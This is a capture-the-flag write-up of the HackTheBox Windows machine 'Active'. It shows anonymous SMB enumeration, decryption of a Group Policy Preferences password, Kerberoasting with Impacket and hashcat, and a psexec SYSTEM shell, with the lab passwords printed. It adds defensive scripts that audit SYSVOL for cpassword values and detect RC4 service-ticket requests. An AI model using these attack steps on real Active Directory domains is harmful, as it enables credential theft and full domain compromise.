# HackTheBox - Active
| OS | Difficulty | IP Address | Status |
|---|---|---|---|
| Windows | Easy | 10.10.10.100 | Retired |
This box was rated Easy and was created by eks and mrb3n on HackTheBox. We gain our foothold by enumerating SMB, which allows anonymous authentication. We find a few shares, one of which contains a username and an encrypted password in a Group Policy Preferences file. We decrypt the password and use it to gain a foothold as that user. For privilege escalation, we request a Kerberos service ticket (Kerberoasting), crack it offline and escalate to Administrator.
## Phase 1 - Enumeration

### Nmap
We start off with an Nmap scan to see which ports are open.
```text
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-18 19:15:12Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
```
At first glance we can tell that this is a Windows machine running Active Directory: DNS, Kerberos, LDAP, SMB and the RPC range are all open, which is the typical port profile of a domain controller.
### SMB

Let's enumerate SMB on ports 139 and 445.
```text
smbclient -L \\10.10.10.100
Enter WORKGROUP\kartofel's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
SMB1 disabled -- no workgroup available
```
An anonymous login was enough to list the SMB shares, and two of them look out of the ordinary for a domain controller: Replication and Users.
Now let’s run SMBMap to list the permissions we have with the anonymous login.
```text
smbmap -u '' -H 10.10.10.100
[+] IP: 10.10.10.100:445        Name: active.htb
        Disk                  Permissions     Comment
        ----                  -----------     -------
        ADMIN$                NO ACCESS       Remote Admin
        C$                    NO ACCESS       Default share
        IPC$                  NO ACCESS       Remote IPC
        NETLOGON              NO ACCESS       Logon server share
        Replication           READ ONLY
        SYSVOL                NO ACCESS       Logon server share
        Users                 NO ACCESS
```
So the anonymous user has read-only access to the Replication share. Let's connect to it and download everything to our machine.
```text
smbclient //10.10.10.100/Replication
Enter WORKGROUP\kartofel's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 13:37:44 2018
  ..                                  D        0  Sat Jul 21 13:37:44 2018
  active.htb                          D        0  Sat Jul 21 13:37:44 2018

                10459647 blocks of size 4096. 5718262 blocks available
smb: \> cd active.htb\
smb: \active.htb\> recurse ON
smb: \active.htb\> prompt OFF
smb: \active.htb\> mget *
```
Going through the data downloaded from the Replication share, we find a file called Groups.xml with the following content:
```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```
In this file, the userName attribute has the value 'active.htb\SVC_TGS' and the cpassword attribute holds an encrypted, base64-encoded password.
### GPP Passwords

A bit of Googling tells us that this is a Group Policy Preferences (GPP) password. It is encrypted with AES, but Microsoft published the key itself, so anyone who can read the file can decrypt it. Whenever a GPP item with a password is created, an XML file describing it is written to the SYSVOL share, which every domain user can read; on this box the Replication share exposes the same files to anonymous users.
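From the defender's side, the fix is to find and remove every preference item that still carries a cpassword. The following audit script is an added example, not part of this writeup: it walks a local copy of SYSVOL (or of a share like Replication) and reports each GPP XML element with a non-empty cpassword. The file-to-attribute map, the sample XML and the placeholder cpassword are constructed for the example.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from typing import NamedTuple

# GPP file names that may carry a cpassword, mapped to the attribute that names the account.
GPP_FILES = {"Groups.xml": "userName", "Services.xml": "accountName", "Drives.xml": "userName",
             "ScheduledTasks.xml": "runAs", "DataSources.xml": "username"}

Finding = NamedTuple("Finding", [("path", str), ("element", str), ("account", str), ("cpassword", str)])

def scan_file(path: str) -> list[Finding]:
    """Report every element in one GPP XML file that carries a non-empty cpassword."""
    account_attr = GPP_FILES.get(os.path.basename(path), "userName")
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return []  # malformed XML: skip this file rather than abort the whole sweep
    return [Finding(path, el.tag, el.get(account_attr) or el.get("name") or "?", cpw)
            for el in root.iter() if (cpw := el.get("cpassword"))]

def scan_tree(base: str) -> list[Finding]:
    """Walk a SYSVOL copy (or, as on this box, the Replication share) and audit each GPP file."""
    hits: list[Finding] = []
    for dirpath, _, files in os.walk(base):
        for fn in files:
            if fn in GPP_FILES:
                hits.extend(scan_file(os.path.join(dirpath, fn)))
    return hits

# Constructed sample with the layout of the Groups.xml found on the Replication share, but a
# placeholder instead of a real cpassword. The second user carries an empty cpassword and
# must not be reported.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User name="active.htb\\SVC_TGS"><Properties action="U" cpassword="PLACEHOLDER_BASE64"
 userName="active.htb\\SVC_TGS"/></User>
<User name="active.htb\\svc_backup"><Properties action="U" cpassword=""
 userName="active.htb\\svc_backup"/></User>
</Groups>"""

def demo() -> list[Finding]:
    """Write the sample under a SYSVOL-like path in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        gpp = os.path.join(tmp, "Policies", "{GUID}", "MACHINE", "Preferences", "Groups")
        os.makedirs(gpp)
        with open(os.path.join(gpp, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_tree(tmp)
```

Every item the script reports should be deleted from the policy and the account's password rotated, since the value was readable by every domain user (here even by anonymous users) for as long as it sat in SYSVOL.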
## Phase 2 - Exploitation

### Decrypting the GPP Password
```text
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
```
Now that we have a username and a password, let's log in and get the user flag.
```text
smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                         DHS        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                      DHS        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                10459647 blocks of size 4096. 6308502 blocks available
```
From the same smbclient session we can navigate to SVC_TGS\Desktop and read user.txt.
## Phase 3 - Privilege Escalation

### Kerberoasting
Back in 2014, Tim Medin presented an attack on the Kerberos authentication protocol as used in Windows Active Directory environments; he called it 'Kerberoasting'. We won't explain why and how it works here, but you can read 0xdf's post on this machine for a better understanding, watch the official SANS webcast presented by Tim Medin himself, or just Google around.

Here we will only go through the steps to Kerberoast.
#### Step 1: Get the Hash

We will use Impacket's GetUserSPNs to request a service ticket for every user account that has an SPN and save it in a crackable format.
```bash
GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
```
Let’s see the output file.
```text
cat GetUserSPNs.out
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$7028f37607953ce9fd6c9060de4aece5$55e2d21e37623a43d8cd5e36e39bfaffc52abead3887ca728d527874107ca042e0e9283ac478b1c91cab58c9184828e7a5e0af452ad2503e463ad2088ba97964f65ac10959a3826a7f99d2d41e2a35c5a2c47392f160d65451156893242004cb6e3052854a9990bac4deb104f838f3e50eca3ba770fbed08...[snip]...
```
#### Step 2: Crack the Hash

Now that we have the hash, let's crack it with Hashcat. Mode 13100 is Kerberos 5 TGS-REP etype 23 (RC4-HMAC), which matches the `$krb5tgs$23$` prefix of the hash.
```bash
hashcat -m 13100 hash.es /usr/share/wordlists/rockyou.txt
```
And we get the Administrator password: 'Ticketmaster1968'.
#### Step 3: Get Root!

Let's use Impacket's psexec to log in as Administrator with the cracked password and get the root flag.
```text
impacket-psexec active.htb/Administrator@10.10.10.100
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file dMCaaHzA.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service aYMa on 10.10.10.100.....
[*] Starting service aYMa.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system
```
And there we have it, rooted!
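On the detection side, the whole Kerberoasting step above leaves a clear trace on the domain controller: event 4769 (a Kerberos service ticket was requested) with TicketEncryptionType 0x17 (RC4, the etype 23 in the `$krb5tgs$23$` hash) for a user account that owns an SPN, often several in a row from one requester. The following detector is an added example, not part of this writeup; it assumes the events have already been flattened into constructed key=value lines using the 4769 field names (TargetUserName, ServiceName, TicketEncryptionType, Status, IpAddress), and the burst threshold and sample records are constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                    # etype 23: what the $krb5tgs$23$ hash above was built from
BURST_SERVICES = 3                   # distinct service accounts roasted by one requester...
BURST_WINDOW = timedelta(minutes=5)  # ...inside this window looks like GetUserSPNs -request

def parse_4769(line: str) -> dict:
    """Split a constructed 'key=value ...' 4769 record into a dict; Time becomes a datetime."""
    ev = dict(tok.split("=", 1) for tok in line.split())
    ev["Time"] = datetime.fromisoformat(ev["Time"])
    return ev

def is_roast_candidate(ev: dict) -> bool:
    """Successful RC4 service ticket for a user-type service account (not a computer, not krbtgt)."""
    svc = ev["ServiceName"].lower()
    return (ev["TicketEncryptionType"] == RC4_HMAC and ev["Status"] == "0x0"
            and not svc.endswith("$") and svc != "krbtgt")

def detect(lines: list[str]) -> list[str]:
    """One alert per RC4 candidate, plus one BURST alert per requester that sprays SPNs."""
    alerts, by_requester = [], defaultdict(list)   # requester -> [(time, service)]
    for ev in map(parse_4769, lines):
        if not is_roast_candidate(ev):
            continue
        who = ev["TargetUserName"]
        alerts.append(f"RC4 TGS: {who} -> {ev['ServiceName']} from {ev['IpAddress']}")
        by_requester[who].append((ev["Time"], ev["ServiceName"]))
    for who, reqs in by_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):                 # sliding window over sorted times
            spns = {svc for t, svc in reqs[i:] if t - t0 <= BURST_WINDOW}
            if len(spns) >= BURST_SERVICES:
                alerts.append(f"BURST: {who} requested {len(spns)} SPNs within {BURST_WINDOW}")
                break
    return alerts

# Constructed 4769 records (not real logs). The first mirrors what this box's DC would have
# logged when SVC_TGS requested Administrator's active/CIFS SPN with etype 23.
SAMPLE_EVENTS = [
    "Time=2018-07-21T10:15:00 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.99",
    "Time=2018-07-21T10:15:05 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.99",
    "Time=2018-07-21T10:15:09 TargetUserName=DC$@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.100",
    "Time=2018-07-21T10:16:00 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.99",
    "Time=2018-07-21T10:17:00 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.99",
    "Time=2018-07-21T11:00:00 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.50",
]
```

The RC4 rule only fires on legacy encryption, so the mitigation pairs with it: give SPN accounts long random passwords (or use group managed service accounts) and restrict them to AES, which removes the etype 23 tickets this cracking step depends on.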